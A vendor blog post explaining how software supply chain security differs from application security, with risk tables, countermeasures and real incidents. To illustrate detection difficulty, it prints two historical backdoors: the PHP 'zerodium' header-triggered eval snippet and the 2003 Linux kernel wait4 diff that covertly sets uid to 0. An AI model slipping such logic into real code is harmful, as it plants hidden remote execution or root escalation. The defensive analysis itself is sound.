SOFTWARE SUPPLY CHAIN

Application Security vs. Software Supply Chain Security: What's the Difference?

Mike Doyle
Head of Security Research
February 27, 2022
Mike Doyle earned a Computer Science degree in 2003, just in time to watch the post-bubble job market dry up. Handy with a bash prompt, he found work as a system admin in an attempt to edge back into development. Instead, he moved toward security consulting and penetration testing (which is what he always wanted to do anyway). Doyle believes that hard problems require elegant solutions.

TL;DR

The growing field of software supply chain security is different in every way we might interact with it, and it requires different tools and techniques from traditional application security.

{{arnica-top-signup-banner="/template-pages/try-arnica-banner"}}

Introduction: Understanding the importance of securing software

We are witnessing an increasing trend in software supply chain attacks. Analysis by Gartner states that “by 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains, a three-fold increase from 2021”. For security professionals who have been working with application security for years, it can be a false comfort to view these new threats through the same lens. It can be easy to treat software supply chain vulnerabilities as if they were someone else’s web bugs, but different tools and techniques are required for managing risk that comes from the software supply chain.

In this blog post we are going to contrast software supply chain security against application security in concrete terms by showing how the two differ in the context of the DevOps process. This allows us to describe the options you have for securing your software supply chain.

How do App Sec and Software Supply Chain Security fit in the DevOps process?

The below diagram shows which App Sec and Software SupplyChain risks exist in a typical DevOps-driven software development process. The chartreuse colored 1 and 7 are application security related risks: the introduction and exploitation of application vulnerabilities, respectively. Dark gray colored numbers 2 through 6 are software supply chain related risks.

Figure 1. Application Security vs Software Supply Chain Security

Stage Risk Countermeasure
Plan Architecture flaw Threat modeling and secure design reviews
Code Implementation bug SAST, DAST, SBOM, Pen Test, Bug Bounty, Secrets Scanning

Table 1. [App Sec] Introducing an App Vulnerability

A typical application security vulnerability is introduced in coding or planning phase.

Plan

Vulnerabilities created during the planning phase are typically caused due to the inability to fully consider the security implications and requirements of the system. For example, failure to realize the security implications for allowing JNDI lookups in log data can lead to surprising results.

Threat modeling performed by experienced analysts can go along way to prevent these lapses.

Code

We can assume that the typical professional software developer doesn’t go out of their way to write insecure code unless their intent is malicious. Producing secure software takes effort. An unexperienced developer may concatenate user input into a SQL query instead of devising a parameterization strategy, or innocently reflects unsensitized data to a web browser without jumping through all the hoops to properly encode it as html. Even classic buffer overflows like Heartbleed take effort to avoid.  

The application security industry has built a wide array of countermeasures for implementation bugs. SAST, SCA, DAST, Penetration Testing, Bug Bounties, and Secrets Scanning tools are all geared toward identifying these defects between when they are implemented and production.

Stage Risk Countermeasure
Code Malicious code injected into the product Mandatory PR reviews without rubber stamping, identify risky code changes
Build Malicious dependency injected into the product Package risk scoring, identify risky code changes

Table 2. [SSC] Injecting Malicious Code or Package

Developers inject malicious code during the coding phase of software development. As a result, malicious third-party packages are introduced—either intentionally or unintentionally—when the code is built into executables and packaged for deployment.

Code

Malicious code can be inserted by legitimate developers or by compromised developer accounts to source code management systems. Finding backdoors, logic bombs, trojan horses and the like as code are difficult to automate.

What do I mean by that? Take the PHP backdoor from March 2021. On receipt of a specific HTTP header, the backdoor uses a string sent with that header as executable PHP code:


  convert_to_string(enc);
  if (strstr(Z_STRVAL_P(enc), "zerodium")) {
    zend_try {
      zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");
    } zend_end_try();
  }

Any static analysis tool that looks for command injection should flag this because this backdoor is implemented as command injection by using the function “zend_eval_string”.

Compare this to a Linux kernel backdoor attempt from 2003 in which the wait4 system call was modified to add this code:

     
  --- GOOD        2003-11-05 13:46:44.000000000 -0800
  +++ BAD 2003-11-05 13:46:53.000000000 -0800
  @@ -1111,6 +1111,8 @@
                  schedule();
                  goto repeat;
          }
  +       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
  +                       retval = -EINVAL;
          retval = -ECHILD;
   end_wait4:
          current->state = TASK_RUNNING;
     
  

Unless you are a very conscientious C programmer, this code looks like it checks to see if a few options are set and if the current user ID is zero, and if so, sets a return value to indicate an invalid condition has occurred. Since those two options should never be set at the same time, this would make sense. However, this code sets the current user’s ID to zero. That second condition in the if statement is a single-equals (‘=’) assignment operation, not a double-equals (‘==’) comparison operation. And setting your user ID to zero in the kernel is a privilege escalation to Linux’s all-powerful root user.

Static analysis would whizz right by this code. I’ve conducted penetration tests of many Unix and Linux systems and never have I written a custom program which calls arbitrary system calls with arbitrary options to see if it results in a privilege escalation.

Fortunately, the Linux kernel has many very conscientious C programmers who perform code reviews as part of a formal approval system, who don’t merely rubber stamp their code reviews but instead carefully analyze their changes before they make their way into the kernel. For this reason, this backdoor was never deployed.

Build

When Dominic Carr was contacted by fellow open-source software developer “right9ctrl” asking to takeover maintenance for “event-stream”, one of his several hundred projects, he said yes. Feature requests were being made to event-stream and Carr didn’t have the bandwidth to care for a package he didn’t even use anymore. Right9ctrl infected event-stream with a backdoored dependency and event-stream thereby infected the 3900+ packages that use it as a dependency in a targeted attack against bitcoin wallet software.

Most organizations do not produce in-depth code reviews of third-party dependencies. Instead, package risk scoring such as OpenSSF’s Scorecard project or BlackDuck’s OpenHub system can help identify immature, under-maintained, and therefore risky dependency packages.

In either the code or build stages you can fight this risk by identifying risky code changes. This is the space that Arnica works in. We will be announcing much more about our capabilities later.

Stage Risk Countermeasure
Code, Build, Test, Release Exfiltration of code or related artifacts Anomaly detection, excessive permission mitigation, threat intelligence

Table 3. [SSC] Exfiltrate Code

In August 2018, Snapchat accidentally released parts of its source code tree as a part of its iOS app release. Mobile app packages are compressed zip files holding everything the app needs to run on a target mobile device and, frequently, lots of things it doesn’t. Snapchat accidentally copied some of its source into that zip file, which was subsequently found by a curious snapchat user and shared on the internet.

The accidental or intentional exfiltration of code can happen at various points in the lifecycle. For Snapchat, it was in the release. Anyone with access to your code at any time can exfiltrate it. Clearly, curbing excessive permissions is key to preventing the majority of risk here. Threat intelligence can clue you in that your code has been disclosed publicly or in the dark web. Anomaly detection and sometimes data loss prevention can identify your code as its on its way out the door.

This risk encompasses the exfiltration of not just code but other software development artifacts. When Anthony Levandowski allegedly stole almost 10 gigabytes of design documentation from self-driving car pioneer Waymo to found his own company, Uber quickly bought the small company for over half a billion dollars. The civil suit was settled for 0.34% of Uber’s equity.

Fortunately for Waymo, they had security systems which let them observe the downloads of the design documents and were able to confirm through external intelligence that Uber was using proprietary features of Waymo’s design which were documented amongst the stolen materials. 

Stage Risk Countermeasure
Build, Release, Deploy Malicious code or binaries injected in the build system Sign and validate code and binaries, dev tool hardening best practices, trusted package distribution system

Table 4. [SSC] Compromise Code Integrity

Sometimes malicious external actors will compromise IT infrastructure to inject malicious code into innocent code. This happened with the Webmin backdoor from 2019. There, the very popular UNIX administration software’s SourceForge package was manipulated to include a command injection vector in its change password functionality, but the source and packages available from their GitHub repo was untouched. Anyone who deployed Webmin by downloading packages from SourceForge were potentially affected.

Protecting the integrity of your code is not a simple matter because of the size and complexity of the attack surface of your pipeline. Reducing that attack surface to the extent you are able is a good first step, but it’s big and complex for a reason: it has a big, complex job to do. Nonetheless, hardening configurations and minimizing the permissions for each component in the pipeline is a worthwhile exercise. Signing code and binaries early is useful but only if those signatures are built on secure/distributed enclaves to prevent tampering, and validated in later phases. Distributed enclaves are a novel approach: after their breach, Solarwinds experimented with running builds in parallel across redundant, distributed build systems so that a similar attacker would have to be in three places at the same time. Having a trusted package distribution system and performing software composition analysis to identify publicly-known vulnerable third party packages can also help manage this risk.

Stage Risk Countermeasure
Deploy Credential reuse Transitive trust issues Reused credential detection Separate pipelines per environment

Table 5. [SSC] Cross-environment Compromise

Cross-environment compromise occurs when authorization to one environment leads to unwanted authorization to another. One simple way this can happen is through the reuse of credentials across different environments. Another is through transitive trust issues in infrastructure, for example, deploying a service to a network/pod of another service.

Centralized secrets managers can prevent the former risk from occurring. Separate pipelines—treating each environment as a different tenant—can help with the latter.

Stage Risk Countermeasure
Operate Backdoor access, unauthorized command execution, data loss, ransomware attacks, etc. API threat protection on SaaS products, XDR is effective only sometimes

Table 6. [SSC] Utilize Backdoor or Malicious Software

We’ve seen how many different ways software supply-chain vulnerabilities can be exploited throughout the DevOps process. Sometimes they are exploited in production as well. This happened during the Siemens logic bomb attack, wherein a developer allegedly created self-destroying Excel macros for the purpose of garnering additional support contracts.

For software products that run on customer premises, that means customer production, as with the SolarWinds cyberattack.

If you have custom backdoors being accessed in production, there’s not a lot you can do at this point. XDR tools might detect especially loud network anomalies. Any other internal controls contributing to your defense in depth strategy can help. For example, API threat protection on SaaS products can identify abnormal API calls. If your intruder is accessing APIs as a part of their attack campaign, this control can help.

Stage Risk Countermeasure
Operate Hackers exploit application vulnerabilities API threat protection, WAFs, XDR

Table 7. [App Sec] Exploiting an App Vulnerability

Finally, we come full circle on the application security side. Operations is the only phase where application security vulnerabilities are exploited.

There are many productized countermeasures in this space, such as API Threat Protection, web application firewalls, and endpoint detection and response systems.

Other notable differences

Notable Difference AppSec Attacks SSC Attacks
Who typically performs the attack Malicious external hackers Malicious or compromised code contributors
What is the attack surface Deployed running code Source code, third party packages, development toolchain, identity providers, productivity tools
Is the vulnerability accidental or intentional Accidental Intentional
How does the attacker “get in” By taking advantage of vulnerabilities in the code and architecture of software By accessing backdoors they put in the code, injecting malicious code to act on their behalf, or they may already be an insider

Table 8. Notable attack differences

Summary

Managing down the risk of software supply chain attacks requires security activities at many places in the DevOps process. While there might be a lot of manual work to do today, software supply chain tools are maturing as awareness grows throughout the DevSecOps industry. Don’t be confused. Join our journey at Arnica.

THE LATEST UPDATES

More from our blog

Guide to SCA and SAST: Secure Your Code Efficiently
Guide to SCA and SAST: Secure Your Code Efficiently
October 15, 2024
A Complete Guide: Enterprise Managed Users vs Bring Your Own Users on GitHub
A Complete Guide: Enterprise Managed Users vs Bring Your Own Users on GitHub
March 25, 2024
How to Determine the Severity of a Third-Party Risk with Software Composition Analysis (SCA)
How to Determine the Severity of a Third-Party Risk with Software Composition Analysis (SCA)
October 30, 2024

{{arnica-bottom-signup-banner="/template-pages/try-arnica-banner"}}